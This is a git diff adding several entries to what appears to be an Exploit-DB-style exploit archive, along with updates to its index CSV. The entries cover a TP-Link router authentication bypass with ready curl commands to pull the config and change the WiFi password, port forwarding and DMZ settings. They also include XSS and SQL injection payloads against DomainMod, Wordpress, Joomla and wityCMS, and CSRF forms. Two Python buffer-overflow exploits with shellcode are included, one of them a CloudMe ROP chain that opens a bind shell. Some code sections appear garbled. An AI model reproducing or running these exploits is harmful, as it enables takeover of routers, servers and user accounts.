diff --git a/exploits/hardware/webapps/44781.txt b/exploits/hardware/webapps/44781.txt new file mode 100644 index 000000000..5c885c857 --- /dev/null +++ b/exploits/hardware/webapps/44781.txt @@ -0,0 +1,207 @@ +Title: TP-Link Multiple Router(TL-WR840N and TL-WR841N) Unauthenticated +Router Access Vulnerability +Author: BlackFog Team +Date: 27 May 2018 +Website: SecureLayer7.net +Contact: info@securelayer7.net + +Version: 0.9.1 4.16 v0001.0 Build 170622 Rel.64334n +Hardware: TL-WR841N v13 00000013 + +Version : Firmware Version: 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n +Hardware Version: TL-WR840N v5 00000005 + +Vendor Description: TP-Link is the world's #1 provider of consumer WiFi +networking devices, shipping products to over 120 countries and hundreds of +millions of customers. (source https://www.tp-link.com/) + + +Attack Description : +This issue is caused by improper session handling on /cgi/ Folder or /cgi +file found by Touhid Shaikh(BlackFog Team Member). + +if any attacker sends Referer Header with its request and sets Referer: +http://192.168.0.1/mainFrame.htm dan its no authentication required and an +attacker can do router's action without authentication. +below are some of few examples you can see. But the attacker can do mostly +all of the action on a router without Authentication. + +NOTE: Except admin's password change bcz its required current password for +changing + +##### POC ###### +----------------------- Fail attempt ------------------------- +root@linux:/workspace# curl -i -s -k -X GET http://192.168.0.1/cgi/conf.bin +HTTP/1.1 403 Forbidden +Content-Type: text/html; charset=utf-8 +Content-Length: 106 +Connection: close + +403 Forbidden

403 +Forbidden

+ +----------------------------------------------------- + +--------------- Seccessfull attempt -------------------------------- +root@linux:/workspace# curl -i -s -k -X GET -H "Referer: +http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin +HTTP/1.1 200 OK +Content-Type: application/octet-stream; charset=utf-8 +Content-Length: 5984 +Connection: keep-alive + +root@linux:/workspace# curl -s -k -X GET -H "Referer: +http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin > +backup.bin +root@linux:/workspace# file backup.bin +backup.bin: data +root@linux:/workspace# ls -la backup.bin +-rw-r--r-- 1 root root 5720 Mar 30 17:17 backup.bin + +---------------------------------------------------- +##### POC END ###### + + +Evil Actions Without Authentication example. +============== Burp Request and curl command for conf.bin or backup file +================= + + +####### Burp ######## +GET /cgi/conf.bin HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Agent22 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.0.1/mainFrame.htm +Connection: close +Upgrade-Insecure-Requests: 1 + +-------Response-------- +HTTP/1.1 200 OK +Content-Type: application/octet-stream; charset=utf-8 +Content-Length: 5720 +Connection: close + +w@\ÝÓb êLýªïÀ‡ÉE‹ûaɬ,*-àh[Ú‹³lÙ€ÍÁ.©- +.....SKIP....... +8/����W + + +######## Curl ########## +curl -i -s -k -X $'GET' -H $'Host: 192.168.0.1' -H $'User-Agent: +Agent22' -H $'Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H +$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H +$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close' $' +http://192.168.0.1/cgi/conf.bin' > backup.bin + +------ take a look in backup.bin file -------- + +=========================================== + + + +=========== Add Port Forwarding ============ +curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent: +Mozilla/Agent22" -H 'Accept: */*' -H "Referer: +http://192.168.0.1/mainFrame.htm" --data-binary +$'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP +or UDP\x0d\x0aopenProtocol=TCP or +UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3 + +HTTP/1.1 200 OK +Content-Type: text/plain; charset=utf-8 +Transfer-Encoding: chunked +Connection: keep-alive + +[1,1,2,7,0,0]0 +triggerPort=23 +triggerProtocol=TCP or UDP +openProtocol=TCP or UDP +enable=1 +openPort=23 +[error]0 + +----- Decription ----- +enable=0 is for disable +enable=1 is for enable +u can change port also. +==================================== + + + +=========== Reboot Router ========================= +curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent: +Mozilla/Agent22" -H 'Accept: */*' -H "Referer: +http://192.168.0.1/mainFrame.htm" --data-binary +$'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7 + +HTTP/1.1 200 OK +Content-Type: text/plain; charset=utf-8 +Transfer-Encoding: chunked +Connection: keep-alive + +[error]0 + +----Description ----- +error = 0 means reboot seccessully +====================================== + + + +============= Enable Guest Network ========================== +curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Aent22' +-H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H +$'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H +$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 844' -H +$'Connection: close' --data-binary +$'[LAN_WLAN_MULTISSID#1,1,0,0,0,0#0,0,0,0,0,0]0,1\x0d\x0amultiSSIDEnable=1\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,1,1,0,0,0#0,0,0,0,0,0]1,11\x0d\x0aIsolateClients=0\x0d\x0aEnable=1\x0d\x0aSSID=Agent22\x0d\x0aBeaconType=WPAand11i\x0d\x0aWPAAuthenticationMode=PSKAuthentication\x0d\x0aWPAEncryptionModes=TKIPandAESEncryption\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=TKIPandAESEncryption\x0d\x0aPreSharedKey=9876543210\x0d\x0aGroupKeyUpdateInterval=0\x0d\x0aMaxStaNum=32\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,2,1,0,0,0#0,0,0,0,0,0]2,1\x0d\x0aIsolateClients=0\x0d\x0a[LAN_WLAN_GUESTNET#1,1,0,0,0,0#0,0,0,0,0,0]3,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=1\x0d\x0a[LAN_WLAN_GUESTNET#1,2,0,0,0,0#0,0,0,0,0,0]4,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=0\x0d\x0a' +$'http://192.168.0.1/cgi?2&2&2&2&2' + +------- Description ---------- +SSID=Agent22 +PreSharedKey=9876543210 +============================================= + + + +======= DMZ enable and Disable on 192.168.0.112 =========== +curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: +Agent22' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H +$'Content-Length: 78' -H $'Connection: close' --data-binary +$'[DMZ_HOST_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,2\x0d\x0aenable=1\x0d\x0aIPAddress=192.168.0.112\x0d\x0a' + $'http://192.168.0.1/cgi?2' + +HTTP/1.1 200 OK +Content-Type: text/plain; charset=utf-8 +Transfer-Encoding: chunked +Connection: close + +[error]0 + +-------Description ----------- +IPAddress=192.168.0.112 +enable=1 or 0 (enable or disable) +================================================= + +=============== WiFi Password Change ============= +curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: +Agent22' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: +text/plain' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H +$'Content-Length: 199' -H $'Connection: close' --data-binary +$'[LAN_WLAN#1,1,0,0,0,0#0,0,0,0,0,0]0,5\x0d\x0aBeaconType=11i\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=AESEncryption\x0d\x0aX_TP_PreSharedKey=9876543210\x0d\x0aX_TP_GroupKeyUpdateInterval=0\x0d\x0a' + $'http://192.168.0.1/cgi?2' + +-------Description ----------- +IEEE11iAuthenticationMode=PSKAuthentication +IEEE11iEncryptionModes=AESEncryption +X_TP_PreSharedKey=9876543210 +=============================== + + + +======= Report Timeline ============= +30 Mar, 2018 ----- Initial Report (support.in@tp-link.com) (No Response) +27 May, 2018 ----- Full Disclosure \ No newline at end of file diff --git a/exploits/php/webapps/44782.txt b/exploits/php/webapps/44782.txt new file mode 100644 index 000000000..7032fc380 --- /dev/null +++ b/exploits/php/webapps/44782.txt @@ -0,0 +1,11 @@ +# Exploit Title: DomainMod v4.09.03 has XSS via the assets/edit/account-owner.php oid parameter +# Date: 2018-05-28 +# Exploit Author: longer(76439392@qq.com) +# Vendor Homepage: domainmod (https://github.com/domainmod/domainmod) +# Software Link: domainmod (https://github.com/domainmod/domainmod) +# Version: v4.09.03 +# CVE : CVE-2018-11403 + +An issue was discovered in DomainMod v4.09.03.(https://github.com/domainmod/domainmod/issues/63) +After the user logged in, open the url : +http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E \ No newline at end of file diff --git a/exploits/php/webapps/44783.txt b/exploits/php/webapps/44783.txt new file mode 100644 index 000000000..4a0f49ba6 --- /dev/null +++ b/exploits/php/webapps/44783.txt @@ -0,0 +1,11 @@ +# Exploit Title: DomainMod v4.09.03 has XSS via the assets/edit/ssl-provider-account.php sslpaid parameter +# Date: 2018-05-28 +# Exploit Author: longer(76439392@qq.com) +# Vendor Homepage: domainmod (https://github.com/domainmod/domainmod) +# Software Link: domainmod (https://github.com/domainmod/domainmod) +# Version: v4.09.03 +# CVE : CVE-2018-11404 + +An issue was discovered in DomainMod v4.09.03.(https://github.com/domainmod/domainmod/issues/63) +After the user logged in, open the url: +http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E \ No newline at end of file diff --git a/exploits/php/webapps/44785.txt b/exploits/php/webapps/44785.txt new file mode 100644 index 000000000..dcca1c669 --- /dev/null +++ b/exploits/php/webapps/44785.txt @@ -0,0 +1,55 @@ +# Exploit Title: Wordpress Plugin Events Calendar - SQL Injection +# Dork: N/A +# Date: 2018-05-27 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor: Wachipi +# Vendor Homepage: https://codecanyon.net/item/wp-events-calendar-plugin/5025660 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : An attacker can perform attacks via calendar ajax queries. +# However, this plugin is fully PHP-enabled. You can run SQL query with +# "month" and "year" parameters. +# These parameters are also suitable for XSS attacks. +# All PHP queries for which these parameters work have the same vulnerable. + +# "getBookingForm.php, getMonthCalendar.php, getEventsList.php" +# Demo : http://www.checkingarea.com/EVENTS_WP/ +# PoC : SQLi : +# GET +/EVENTS_WP/wp-content/plugins/wp-events-calendar/public/ajax/getEventsList.php?year=2018&month=5&day=1&calendar_id=1&pag=1 + + + +# Parameter: month (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: +year=2018&month=5' AND 7958=7958 AND 'FXnO'='FXnO&day=1&calendar_id=1&pag=1 + +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: +year=2018&month=5' AND SLEEP(5) AND 'MmZz'='MmZz&day=1&calendar_id=1&pag=1 + +# Type: UNION query +# Title: MySQL UNION query (NULL) - 29 columns +# Payload: +year=2018&month=5' UNION ALL SELECT NULL,NULL,CONCAT&day=1&calendar_id=1&pag=1(0x71786a7171,0x424e507748695862436e774c4a4d664a7751424c537678554656465a464b7074685051527676756e,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&calendar_id=1 + +# Parameter: year (GET) +# Type: boolean-based blind +# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) +# Payload: +year=-8454' OR 7997=7997#&month=5&day=1&calendar_id=1&pag=1 + +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: +year=2018' AND SLEEP(5)-- +uTJs&month=5&day=1&calendar_id=1&pag=1 + +# Type: UNION query +# Title: MySQL UNION query (NULL) - 29 columns +# Payload: +year=2018' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a7171,0x7766694a50504a425a6e635a564b5172674c745770414e4f46494977475a44626b416a6c797a674b,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&month=5&day=1&calendar_id=1&pag=1 \ No newline at end of file diff --git a/exploits/php/webapps/44786.txt b/exploits/php/webapps/44786.txt new file mode 100644 index 000000000..4922216a1 --- /dev/null +++ b/exploits/php/webapps/44786.txt @@ -0,0 +1,31 @@ +# Exploit Title: Joomla! extension Full Social 1.1.0 - 'search_query' SQL +Injection +# Date: 2018-05-28 +# Exploit Author: L0RD or borna.nematzadeh123@gmail.com +# Software Link: https://extensions.joomla.org/extension/full-social/ +# Vendor Homepage: https://www.joomlaextensions.co.in/ +# Version: 1.1.0 +# Tested on: Win 10 +=================================================== +# POC : SQLi + +# Parameter : search_query +# Type : Time-based blind +# Payload : 1%' AND SLEEP(10)%23 + +# Request +============ +GET +/en/search?controller=search&orderby=position&orderway=desc&search_query=1%25%27+AND+SLEEP%2810%29%23&submit_search= +HTTP/1.1 +Host: www.site.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) +Gecko/20100101 Firefox/61.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://www.site.com/en/ +Connection: keep-alive +Upgrade-Insecure-Requests: 1 + +=================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44788.html b/exploits/php/webapps/44788.html new file mode 100644 index 000000000..4032dd3e4 --- /dev/null +++ b/exploits/php/webapps/44788.html @@ -0,0 +1,61 @@ +# Exploit Title: Joomla! extension jCart for OpenCart 2.3.0.2 - Cross site request forgery +# Date: 2018-05-28 +# Exploit Author: L0RD or borna.nematzadeh123@gmail.com +# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/jcart-for-opencart/ +# Vendor Homepage: https://www.joomlaextensions.co.in/ +# Version: 2.3.0.2 +# Tested on: Kali linux +=================================================== + +# POC : + +# Change user information exploit : + + + +
+ + + + +
+ + + + + +# Change password exploit : + +
+ + +
+ + + +# Change affiliate account information exploit : + +
+ + + + + + + + + + + +
+ + +==================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44789.html b/exploits/php/webapps/44789.html new file mode 100644 index 000000000..f35008609 --- /dev/null +++ b/exploits/php/webapps/44789.html @@ -0,0 +1,40 @@ +# Exploit Title: Joomla! extension JoomOCShop 1.0 - Cross site request forgery +# Date: 2018-05-28 +# Exploit Author: L0RD or borna.nematzadeh123@gmail.com +# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/joomocshop/ +# Vendor Homepage: https://www.joomlaextensions.co.in/ +# Version: 1.0 +# Tested on: Kali linux +=================================================== + +# POC : + +# Change user information exploit : + + + +
+ + + + + +
+ + + + + +# Change password exploit : + +
+ + +
+ + +==================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44790.txt b/exploits/php/webapps/44790.txt new file mode 100644 index 000000000..1cd2518ac --- /dev/null +++ b/exploits/php/webapps/44790.txt @@ -0,0 +1,34 @@ +# Exploit Title: wityCMS 0.6.1 Persistent XSS on "Website's name" field +# Date: 05/28/2018 +# Exploit Author: Nathu Nandwani +# Website: http://nandtech.co/ +# Vendor Homepage: https://creatiwity.net/witycms +# Software Link: https://github.com/Creatiwity/wityCMS/releases/tag/0.6.1 +# Version: 0.6.1 +# Tested on: Windows 10 x64 (XAMPP, Chrome) +# CVE: CVE-2018-11512 + +*Description + +A persistent/stored cross-site scripting (XSS) vulnerability in the "Website's name" field found in the "Settings" page under the "General" menu in Creatiwity wityCMS 0.6.1 allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to admin/settings/general. + +*Proof of Concept + +1. Attacker logs in as an administrator of the site. +2. Attacker visits the Administrator page and clicks on the general options then settings menu. +3. Attacker enters the script below in the "Website's name" field: +pt>alert(1)pt> +Note: The "script" tag is being filtered but not recursively so having the first tag stripped off will still execute the one being combined. +3. Once the "Save" button is clicked, the payload will execute. +4. When an unauthenticated user visits the home page, the payload will also execute. + +*Mitigation + +See https://github.com/Creatiwity/wityCMS/commit/7967e5bf15b4d2ee6b85b56e82d7e1229147de44 + +Timeline + +2018-05-27-Vulnerability reported to wityCMS development team +2018-05-27-CVE requested from mitre.org +2018-05-28-wityCMS development team acknowledges and will be pushing the fix for production on 0.6.2 +2015-05-28-CVE published by mitre: https://twitter.com/CVEnew/status/1001093385929805831 \ No newline at end of file diff --git a/exploits/windows_x86-64/remote/44784.py b/exploits/windows_x86-64/remote/44784.py new file mode 100755 index 000000000..93a35e740 --- /dev/null +++ b/exploits/windows_x86-64/remote/44784.py @@ -0,0 +1,140 @@ +# Exploit: CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) +# Date: 2018-05-27 +# Author: Juan Prescotto +# Tested Against: Win7 Pro SP1 64 bit +# Software Download: https://www.cloudme.com/downloads/CloudMe_1109.exe +# Tested Against Version: 1.10.9 +# Special Thanks to my wife for allowing me spend countless hours on this passion of mine +# Credit: Thanks to John Page (aka hyp3rlinx) (https://www.exploit-db.com/exploits/44027/) +# for his work on the original exploit + +# Bad Characers: \x00 +# SEH Offset: 2236 +# Non-Participating Modules Used: Qt5Gui.dll, Qt5Core.dll,libstdc++-6.dll, libgcc_s_dw2-1.dll, libwinpthread-1.dll + +# Victim Machine: +# C:\>netstat -nao | find "8888" +# TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 2640 +# C:\>tasklist | find "2640" +# CloudMe.exe 2640 Console 1 36,632 K + +# Attacking Machine: +# root@kali:~/Desktop# python cloudme.py +# CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass +# [+] CloudMe Target IP> 192.168.12.4 +# Sending buffer overflow to CloudMe Service +# Target Should be Running a Bind Shell on Port 4444! + +# root@kali:~/Desktop# nc -nv 192.168.12.4 4444 +# (UNKNOWN) [192.168.12.4] 4444 (?) open +# Microsoft Windows [Version 6.1.7601] +# Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +# C:\Users\jprescotto\AppData\Local\Programs\CloudMe\CloudMe> +# My register setup when VirtualProtect() is called (Defeat DEP) : + -- +# EAX = NOP (0x90909090) +# ECX = lpOldProtect (ptr to W address) +# EDX = NewProtect (0x40) +# EBX = dwSize +# ESP = lPAddress (automatic) +# EBP = ReturnTo (ptr to jmp esp) +# ESI = ptr to VirtualProtect() +# EDI = ROP NOP (RETN) + +#!/usr/bin/python + +import socket,struct + +print 'CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass' + +def create_rop_chain(): + + rop chain generated with mona.py - www.corelan.be + rop_gadgets = [ + 0x61d1e7fe, POP ECX RETN [Qt5Gui.dll] + 0x690398a8, ptr to &VirtualProtect() [IAT Qt5Core.dll] + 0x6fe70610, MOV EAX,DWORD PTR DS:[ECX] RETN [libstdc++-6.dll] + 0x61c40a6f, XCHG EAX,ESI RETN [Qt5Gui.dll] + 0x68c8ea5a, POP EBP RETN [Qt5Core.dll] + 0x68d652e1, & call esp [Qt5Core.dll] + 0x68fa7ca2, POP EDX RETN [Qt5Core.dll] + 0xfffffdff, Value to negate, will become 0x00000201 + 0x6eb47092, NEG EDX RETN [libgcc_s_dw2-1.dll] + 0x68d52747, POP EBX RETN [Qt5Core.dll] + 0xffffffff, + 0x68f948bc, INC EBX RETN [Qt5Core.dll] + 0x68f8063c, ADD EBX,EDX ADD AL,0A RETN [Qt5Core.dll] + 0x68f9a472, POP EDX RETN [Qt5Core.dll] + 0xffffffc0, Value to negate, will become 0x00000040 + 0x6eb47092, NEG EDX RETN [libgcc_s_dw2-1.dll] + 0x61f057ab, POP ECX RETN [Qt5Gui.dll] + 0x6eb5efa3, &Writable location [libgcc_s_dw2-1.dll] + 0x61dc14d1, POP EDI RETN [Qt5Gui.dll] + 0x64b4ed0c, RETN (ROP NOP) [libwinpthread-1.dll] + 0x61ba6245, POP EAX RETN [Qt5Gui.dll] + 0x90909090, nop + 0x61b45ea3, PUSHAD RETN [Qt5Gui.dll] + ] + return ''.join(struct.pack(' show options +#Module options (payload/windows/shell_bind_tcp): +# Name Current Setting Required Description +# EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +# LPORT 4444 yes The listen port +# RHOST no The target address +#msf payload(shell_bind_tcp) > generate -b '\x00' -t py +# windows/shell_bind_tcp - 355 bytes +# http://www.metasploit.com +# Encoder: x86/shikata_ga_nai + +shellcode = "" +shellcode += "\xda\xcf\xba\x8c\x90\x7b\x70\xd9\x74\x24\xf4\x5e\x33" +shellcode += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\xda\x83\x99" +shellcode += "\x85\x1e\x4b\xdf\x66\xde\x8c\x80\xef\x3b\xbd\x80\x94" +shellcode += "\x48\xee\x30\xde\x1c\x03\xba\xb2\xb4\x90\xce\x1a\xbb" +shellcode += "\x11\x64\x7d\xf2\xa2\xd5\xbd\x95\x20\x24\x92\x75\x18" +shellcode += "\xe7\xe7\x74\x5d\x1a\x05\x24\x36\x50\xb8\xd8\x33\x2c" +shellcode += "\x01\x53\x0f\xa0\x01\x80\xd8\xc3\x20\x17\x52\x9a\xe2" +shellcode += "\x96\xb7\x96\xaa\x80\xd4\x93\x65\x3b\x2e\x6f\x74\xed" +shellcode += "\x7e\x90\xdb\xd0\x4e\x63\x25\x15\x68\x9c\x50\x6f\x8a" +shellcode += "\x21\x63\xb4\xf0\xfd\xe6\x2e\x52\x75\x50\x8a\x62\x5a" +shellcode += "\x07\x59\x68\x17\x43\x05\x6d\xa6\x80\x3e\x89\x23\x27" +shellcode += "\x90\x1b\x77\x0c\x34\x47\x23\x2d\x6d\x2d\x82\x52\x6d" +shellcode += "\x8e\x7b\xf7\xe6\x23\x6f\x8a\xa5\x2b\x5c\xa7\x55\xac" +shellcode += "\xca\xb0\x26\x9e\x55\x6b\xa0\x92\x1e\xb5\x37\xd4\x34" +shellcode += "\x01\xa7\x2b\xb7\x72\xee\xef\xe3\x22\x98\xc6\x8b\xa8" +shellcode += "\x58\xe6\x59\x44\x50\x41\x32\x7b\x9d\x31\xe2\x3b\x0d" +shellcode += "\xda\xe8\xb3\x72\xfa\x12\x1e\x1b\x93\xee\xa1\x32\x38" +shellcode += "\x66\x47\x5e\xd0\x2e\xdf\xf6\x12\x15\xe8\x61\x6c\x7f" +shellcode += "\x40\x05\x25\x69\x57\x2a\xb6\xbf\xff\xbc\x3d\xac\x3b" +shellcode += "\xdd\x41\xf9\x6b\x8a\xd6\x77\xfa\xf9\x47\x87\xd7\x69" +shellcode += "\xeb\x1a\xbc\x69\x62\x07\x6b\x3e\x23\xf9\x62\xaa\xd9" +shellcode += "\xa0\xdc\xc8\x23\x34\x26\x48\xf8\x85\xa9\x51\x8d\xb2" +shellcode += "\x8d\x41\x4b\x3a\x8a\x35\x03\x6d\x44\xe3\xe5\xc7\x26" +shellcode += "\x5d\xbc\xb4\xe0\x09\x39\xf7\x32\x4f\x46\xd2\xc4\xaf" +shellcode += "\xf7\x8b\x90\xd0\x38\x5c\x15\xa9\x24\xfc\xda\x60\xed" +shellcode += "\x1c\x39\xa0\x18\xb5\xe4\x21\xa1\xd8\x16\x9c\xe6\xe4" +shellcode += "\x94\x14\x97\x12\x84\x5d\x92\x5f\x02\x8e\xee\xf0\xe7" +shellcode += "\xb0\x5d\xf0\x2d" + +ip=raw_input('[+] CloudMe Target IP> ') + +stack_pivot=struct.pack(' rop_chain) : SUB ESP,8 ADD ESP,0D8C POP EBX POP ESI POP EDI POP EBP RETN 0x08 ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ} +rop_nop1=struct.pack('Preference->Security->New password &Confirm password' + +#seh- 0041A6EF "\xEF\xA6\x41" +#address to jump 0012FA7A +#nseh- "\xEB\xAC\x90\x90" +#winexec address 0x7c862aed + +#!/usr/bin/python + +shellcode=("\x33\xC0" +"\x50" +"\x68\x63\x61\x6C\x63" +"\x8B\xC4" +"\x50" +"\xE8\x61\x30\x73\x7C") + +buf="\x90"*4 + shellcode + "\x90"*(80-len(shellcode)) + "\xEB\xAC\x90\x90" + "\xEF\xA6\x41" + +f=open("alftp.txt","w") +f.write(buf) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 6daef7c49..2b3689d22 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9745,6 +9745,7 @@ id,file,description,date,author,type,platform,port 44745,exploits/windows/local/44745.txt,"Flash ActiveX 28.0.0.137 - Code Execution (2)",2016-02-13,smgorelik,local,windows, 44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux, 44776,exploits/android/local/44776.txt,"Werewolf Online 0.8.8 - Information Disclosure",2018-05-27,ManhNho,local,android, +44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16528,6 +16529,7 @@ id,file,description,date,author,type,platform,port 44656,exploits/multiple/remote/44656.txt,"mySCADA myPRO 7 - Hard-Coded Credentials",2018-05-20,"Emre ÖVÜNÇ",remote,multiple, 44760,exploits/hardware/remote/44760.rb,"D-Link DSL-2750B - OS Command Injection (Metasploit)",2018-05-25,Metasploit,remote,hardware, 44779,exploits/hardware/remote/44779.txt,"Bitmain Antminer D3/L3+/S9 - Remote Command Execution",2018-05-27,CorryL,remote,hardware, +44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39442,7 +39444,7 @@ id,file,description,date,author,type,platform,port 44765,exploits/php/webapps/44765.txt,"EasyService Billing 1.0 - 'q' SQL Injection",2018-05-26,"Divya Jain",webapps,php, 44766,exploits/php/webapps/44766.txt,"mySurvey 1.0 - 'id' SQL Injection",2018-05-26,AkkuS,webapps,php, 44767,exploits/php/webapps/44767.txt,"easyLetters 1.0 - 'id' SQL Injection",2018-05-26,AkkuS,webapps,php, -44769,exploits/php/webapps/44769.txt,"Wordpress Plugin Events Calendar - SQL Injection / Cross-Site Scripting",2018-05-27,AkkuS,webapps,php, +44769,exploits/php/webapps/44769.txt,"Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting",2018-05-27,AkkuS,webapps,php, 44770,exploits/php/webapps/44770.txt,"Ingenious School Management System - 'id' SQL Injection",2018-05-27,"Meisam Monsef",webapps,php, 44771,exploits/php/webapps/44771.html,"Sharetronix CMS 3.6.2 - Cross-Site Request Forgery / Cross-Site Scripting",2018-05-27,"Hesam Bazvand",webapps,php, 44772,exploits/php/webapps/44772.txt,"Lyrist - 'id' SQL Injection",2018-05-27,"Meisam Monsef",webapps,php, @@ -39451,3 +39453,11 @@ id,file,description,date,author,type,platform,port 44775,exploits/php/webapps/44775.txt,"ClipperCMS 1.3.3 - Cross-Site Scripting",2018-05-27,"Nathu Nandwani",webapps,php, 44777,exploits/php/webapps/44777.txt,"My Directory 2.0 - SQL Injection / Cross-Site Scripting",2018-05-27,AkkuS,webapps,php, 44778,exploits/php/webapps/44778.txt,"Baby Names Search Engine 1.0 - 'a' SQL Injection",2018-05-27,AkkuS,webapps,php, +44781,exploits/hardware/webapps/44781.txt,"TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass",2018-05-28,"BlackFog Team",webapps,hardware, +44782,exploits/php/webapps/44782.txt,"DomainMod 4.09.03 - 'oid' Cross-Site Scripting",2018-05-28,longer,webapps,php, +44783,exploits/php/webapps/44783.txt,"DomainMod 4.09.03 - 'sslpaid' Cross-Site Scripting",2018-05-28,longer,webapps,php, +44785,exploits/php/webapps/44785.txt,"Wordpress Plugin Events Calendar - SQL Injection",2018-05-28,AkkuS,webapps,php, +44786,exploits/php/webapps/44786.txt,"Joomla! Component Full Social 1.1.0 - 'search_query' SQL 